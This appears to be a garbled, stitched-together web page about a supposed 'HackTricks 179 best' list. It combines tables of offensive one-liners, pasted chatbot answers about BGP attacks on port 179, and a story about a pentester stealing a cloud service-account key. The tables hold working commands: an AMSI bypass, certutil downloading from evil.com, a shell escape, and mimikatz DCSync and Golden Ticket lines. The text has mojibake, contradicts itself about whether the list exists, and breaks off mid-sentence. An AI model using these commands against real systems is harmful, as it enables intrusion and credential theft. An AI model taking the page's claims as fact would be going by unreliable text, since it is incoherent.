Hacktricks 179 - Best

| # | Trick | Description | |---|-------|-------------| | 141 | AMSI bypass (powershell) | [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) | | 142 | ETW bypass (syscall) | NtRaiseHardError + NtCreateThreadEx | | 143 | DLL sideloading | Place malicious version.dll in app folder | | 144 | Alternate data streams | type payload.exe > legit.txt:payload.exe | | 145 | LOLBAS (living off the land) | certutil -urlcache -f http://evil.com/file.exe file.exe | | 146 | GTFOBins for *nix | find . -exec /bin/sh \; -quit | | ... | ... | ... | | 160 | Process hollowing | Create suspended process в†’ replace image |

So, what makes the cut? According to aggregated community rankings, the "HackTricks 179 best" techniques fall into four critical categories. Below is a breakdown of the top sections you must memorize.

Before diving into the "179 best," we must understand the source. Created by Carlos Polop, HackTricks is an open-source, collaborative repository (hosted on GitHub and GitBook) that contains thousands of techniques for Privilege Escalation, Active Directory exploitation, Container escaping, and Web pentesting.

Every day, thousands of security professionals visit the site to quickly recall a find command for SUID binaries or a specific enum4linux switch.

HackTricks is massive. With over 1,000 pages of raw data, beginners often suffer from decision paralysis. The phrase "HackTricks 179 best" originated from a community-driven effort to filter the noise down to the 179 most impactful commands—the ones that yield a shell 90% of the time.

These are not random commands. The "179 best" refer to the specific enumeration scripts, one-liners, and exploitation techniques that have the highest success rate during internal network penetration tests.

No breach or leak — There is no verified story about a “HackTricks 179 best” leak, hack, or incident. HackTricks is a legitimate educational resource, not a hacking group or malicious tool.

| # | Trick | Command / Tool | |---|-------|----------------| | 91 | BloodHound collection | SharpHound.exe -c All | | 92 | ASREPRoast | GetNPUsers.py domain.com/user -dc-ip | | 93 | Kerberoast | GetUserSPNs.py domain.com/user -dc-ip -request | | 94 | Pass-the-Hash | xfreerdp /u:user /pth:hash /v:target | | 95 | DCSync | mimikatz "lsadump::dcsync /user:krbtgt" | | 96 | Golden Ticket | mimikatz "kerberos::golden /user:Administrator /domain:..." | | 97 | Silver Ticket | For CIFS, HOST, HTTP services | | 98 | SCF file attack on share | Write .scf with icon path to UNC | | 99 | GPO abuse | gpresult /r в†’ modify startup scripts | | 100 | AD ACL misconfig | Find-InterestingDomainAcl (PowerView) | | ... | ... | ... | | 110 | Shadow Credentials (Whitespook) | pyWhisker.py --target computer$ |

For Windows environments, HackTricks is famous for its detailed breakdown of "Potato" attacks (Hot Potato, Rotten Potato, Juicy Potato).

On HackTricks, information related to TCP Port 179 specifically covers the Border Gateway Protocol (BGP), which is the backbone of internet routing. While HackTricks is widely known for its web and system exploitation guides, its networking section provides critical checklists for testing infrastructure services like BGP.В 

Below is a breakdown of the best "solid content" you can find on HackTricks and related pentesting methodologies for port 179.В  рџ›ЎпёЏ HackTricks: Pentesting BGP (Port 179)В 

HackTricks typically organizes port-specific information into a "Pentesting [Service Name]" format. For BGP, the focus is on enumeration and vulnerability assessment.В  1. Basic EnumerationВ 

The first step is identifying if the port is open and reachable.В  Banner Grabbing: Use nc or telnet to check for a response. Nmap Scan: nmap -p 179 -sV --script=bgp-info Use code with caution. Copied to clipboard

This identifies the BGP version and sometimes the Autonomous System (AS) number.В  2. Potential VulnerabilitiesВ  HackTricks highlights several attack vectors for BGP:В 

BGP Hijacking: Announcing false routes to redirect traffic to an attacker-controlled network.

DoS (Denial of Service): Sending malformed packets or forcing session resets (route flapping) to disrupt internet connectivity.

MD5 Password Cracking: If MD5 authentication is used (common but old), attackers can attempt to capture and crack the hash from the TCP session.В  рџљЂ Key Exploitation ConceptsВ 

If you are looking for "solid" advanced content, these are the core techniques often discussed in relation to port 179:В  Route ManipulationВ 

Prefix Hijacking: An attacker's router claims to own a specific IP range it doesn't actually control.

AS Path Prepending: Artificially making a path look longer or shorter to influence how traffic flows.В  Session HijackingВ 

Since BGP runs over TCP, standard TCP session hijacking techniques (like sequence number prediction) can theoretically be used to inject malicious UPDATE messages.В  рџ’Ў Best Resources for PracticeВ 

Beyond the HackTricks wiki, these labs and guides provide hands-on experience:В 

SEED Labs (BGP Exploration): A comprehensive academic lab that allows you to simulate prefix hijacking in a controlled environment. hacktricks 179 best

PentestPad: Offers specific "Quick Reference" sheets for port 179, including common risks like Man-in-the-Middle and Route Leaks.В  If you'd like, I can help you:В  Draft a report for a simulated BGP audit. Explain the difference between iBGP and eBGP security. Find specific Nmap scripts for deeper network enumeration.В  How would you like to deepen your knowledge of port 179?В  Pentesting Network - HackTricks - Mintlify

BGP is the "glue" of the internet, directing data packets between different networks (Autonomous Systems). Because it relies on TCP port 179, it is susceptible to several classic network attacks if not properly hardened. рџ—ќпёЏ Key "HackTricks" for Port 179

Neighbor Spoofing: Since BGP often relies on trust between IP peers, an attacker can attempt to spoof a legitimate neighbor's IP to establish a rogue session.

BGP Hijacking: By advertising more specific or "better" routes (IP prefixes), an attacker can trick other routers into sending traffic through their own infrastructure.

DoS via Route Flapping: Rapidly sending "up" and "down" notifications for a route can trigger "Route Flap Dampening" in routers, effectively knocking a target network offline as other routers stop trusting its routes.

MD5 Cracking: Many BGP sessions use a simple MD5 password for authentication. If an attacker can sniff the TCP three-way handshake, they can attempt to crack this password offline to join the BGP peer group. рџ› пёЏ Common Countermeasures

BGP TTL Security (GTSM): Routers only accept BGP packets with a Time-to-Live (TTL) of 255, ensuring the sender is directly connected and not a remote attacker.

Prefix Filtering: Strict lists that define exactly which IP ranges a neighbor is allowed to advertise.

RPKI (Resource Public Key Infrastructure): A cryptographic method to prove that a specific network actually owns the IP addresses it is claiming to have.

ACLs: Using Access Control Lists to block any unauthorized IP addresses from even attempting to connect to TCP port 179. If you'd like, I can: Explain the step-by-step process of a BGP hijack Show you the Cisco commands used to secure Port 179

Provide a list of open-source tools (like BGPStream) used to monitor for route leaks

While "179 best" is not a standard official category on HackTricks

, the site is widely regarded as the "best" encyclopedia for cybersecurity professionals. It provides a massive collection of Pentesting Methodologies used by hackers and security researchers worldwide. HackTricks Core Areas of HackTricks

The platform is structured around specific high-impact hacking domains: Web Vulnerabilities : Extensive guides on 403 and 401 Bypasses

, using path fuzzing and Unicode bypasses to access restricted content. Privilege Escalation : Detailed checklists for Linux Privilege Escalation

, including kernel exploits like DirtyCow and abusing SUID binaries. Cloud Security : A specialized section on HackTricks Cloud

focusing on CI/CD methodologies and cloud-specific misconfigurations. Mobile Pentesting : Comprehensive checklists for both Android APK iOS applications , covering insecure data storage and IPC vulnerabilities. HackTricks Essential Tools Highlighted HackTricks often points to specific "best-in-class" tools:

: Recommended as the best tool for identifying Linux local privilege escalation vectors. Kiterunner

: Highlighted for its efficiency in discovering hidden API endpoints.

: The broader suite that includes WinPEAS and LinPEAS for multi-platform privilege escalation. Community Features

The project is highly collaborative, encouraging users to share "hacking tricks" by submitting PRs to their GitHub repositories or joining their active Discord and Telegram communities iOS Pentesting Checklist - HackTricks

Port 179 is the default for the Border Gateway Protocol (BGP) | # | Trick | Description | |---|-------|-------------|

, the "glue" that holds the internet together by exchanging routing information between Autonomous Systems (AS).

In a penetration testing or CTF context (like HackTricks), finding this port open is rare on standard servers and usually points to a network device or a misconfigured edge router. Below is a write-up on how to identify and exploit BGP-related vulnerabilities. 1. Enumeration & Identification When you find port 179/TCP open during an scan, it indicates a BGP speaker. Active vs. Passive : BGP peers use a client/server model where the router listens on port 179 while the router initiates the connection. Version Detection : Standard service scans (

) might return limited info. Use specific scripts to grab banners or identify the software (e.g., Cisco IOS, Quagga, FRRouting). 2. Common Vulnerabilities & Attacks

BGP is notoriously vulnerable because it was not originally built with security in mind. BGP Hijacking

: Attackers can inject bogus routing information by announcing IP prefixes they don't own. If the announcement is "more specific" (longer prefix) or claims a shorter path, traffic for those IPs will be rerouted through the attacker. DoS via Reset (TCP RST)

: Since BGP runs on a long-lived TCP connection, an attacker can disrupt communications by spoofing a TCP RST packet to break the peer-to-peer link. Route Flapping

: By repeatedly injecting and withdrawing routes, an attacker can cause a router to constantly recalculate paths, leading to CPU exhaustion or network instability. 3. Exploitation Tactics

If you have access to a network device and want to manipulate BGP: Establish Peering

: Attempt to form a neighbor relationship with the target. This often requires knowing the correct Autonomous System (AS) number and, in many cases, a pre-shared MD5 password Neighbor Adjacency : Once connected, use commands like show ip bgp neighbors

(on Cisco/Vtysh) to see existing peers and advertised routes. Prefix Injection : Use a terminal like

to configure a new network advertisement for a range you want to intercept. 4. BGP Best Path Selection

Routers choose the "best" route based on a specific hierarchy. To successfully hijack or influence traffic, your injected route must win this selection process: BGP Hijacking Attack. Border Gateway Protocol, Network…

The fluorescent hum of the server room was the only sound Julian could hear, other than the frantic thumping of his own heart. He was six minutes into a penetration test for Omni-Corp, a biotech giant with more patents than morals, and he had hit a wall.

The external perimeter was tight. The WAF (Web Application Firewall) was blocking every injection attempt, and the SSH ports were locked down tighter than a bank vault. Julian was about to pack it up and write a sad report about "defense in depth" when he remembered the mantra. The bible.

He minimized his terminal and opened the familiar dark-blue webpage. The Book of Tricks.

He scrolled past the basics. He needed something esoteric. He typed into the search bar: "best".

The results shifted. He wasn't looking for the obvious paths; he was looking for the cracks in the pavement. He found himself staring at entry number 179 on his saved list of "Best Kept Secrets" from the HackTricks repository. It wasn't a headline exploit like Log4j; it was a subtlety regarding Google BigQuery enumeration via poorly configured IAM permissions on Cloud Storage.

"Nobody uses BigQuery externally," Julian muttered to himself, sweat beading on his forehead. "Unless they forgot to separate their dev and prod environments."

He pulled up the specific payload mentioned in the trick. It was a gsutil command designed to list buckets, but with a specific flag that often bypassed the standard ACL checks on legacy accounts.

gsutil ls -p omni-corp-analytics-backup

He hit enter.

Access Denied.

He sighed. But HackTricks didn't just give a command; it gave the theory. Item 179 noted that if the projectID was slightly different from the root domain, legacy permissions often leaked. Omni-Corp had acquired a smaller startup, 'GeneSys', last year.

Julian tried again. gsutil ls -p genesys-backup-storage

The terminal cursor blinked. Once. Twice.

Then, a dump of text.

gs://genesys-backup-storage/confidential/
gs://genesys-backup-storage/secrets/
gs://genesys-backup-storage/user-data/

"Gotcha," Julian whispered.

He had bypassed the edge. He was in the storage bucket, but the files were encrypted. The HackTricks entry for 179 had a footnote, a small "Tip" highlighted in red text: Look for service account keys stored in .json format inside 'configuration' folders. Developers are lazy.

Julian copied the gsutil cp command to download the contents of the confidential/ folder. It downloaded a file named app_config_dev.json.

He opened it. It was a mess of environment variables, but right there at the bottom, plain as day, was a client_email and a private_key.

He had a Service Account key.

Now, he wasn't just a guy hitting a wall. He was inside the identity management system. He configured his gcloud credentials with the JSON file.

gcloud auth activate-service-account --key-file=app_config_dev.json

Activated.

The hack wasn't just about getting in; it was about moving laterally. The HackTricks page suggested checking the permissions of this service account. Was it just a reader? Or did it have roles/owner?

gcloud projects get-iam-policy genesys-backup-storage

The output scrolled. The service account had roles/storage.admin. He could write. He could delete. But then, he saw something worse. It had roles/cloudbuild.builds.editor.

He remembered reading about a privilege escalation path involving Cloud Build. He wasn't just in the bucket anymore; he could create a build that executed arbitrary code on the build server, effectively giving him shell access to the internal network.

Julian leaned back. The fluorescent lights seemed a little brighter. The wall hadn't just been climbed; it had been dismantled brick by brick, all thanks to a specific, obscure trick found in the margins of the world's greatest playbook.

He typed the final command to generate the reverse shell payload via the Cloud Build vulnerability.

Connection established.

"Happy hunting," Julian typed into the terminal, a tribute to the community that had taught him how to see the invisible.

As of late 2025, the "HackTricks 179 best" continues to evolve. With the rise of AI-generated code, new vulnerabilities like Leaky Vessels (CVE-2024-21626) are being added to the list, pushing older, obsolete techniques out.

To stay current, you must follow the official HackTricks GitHub commits. The community maintains a living document of the "179 best" in the Issues section, where users debate which command deserves a spot in the top 10. No breach or leak — There is no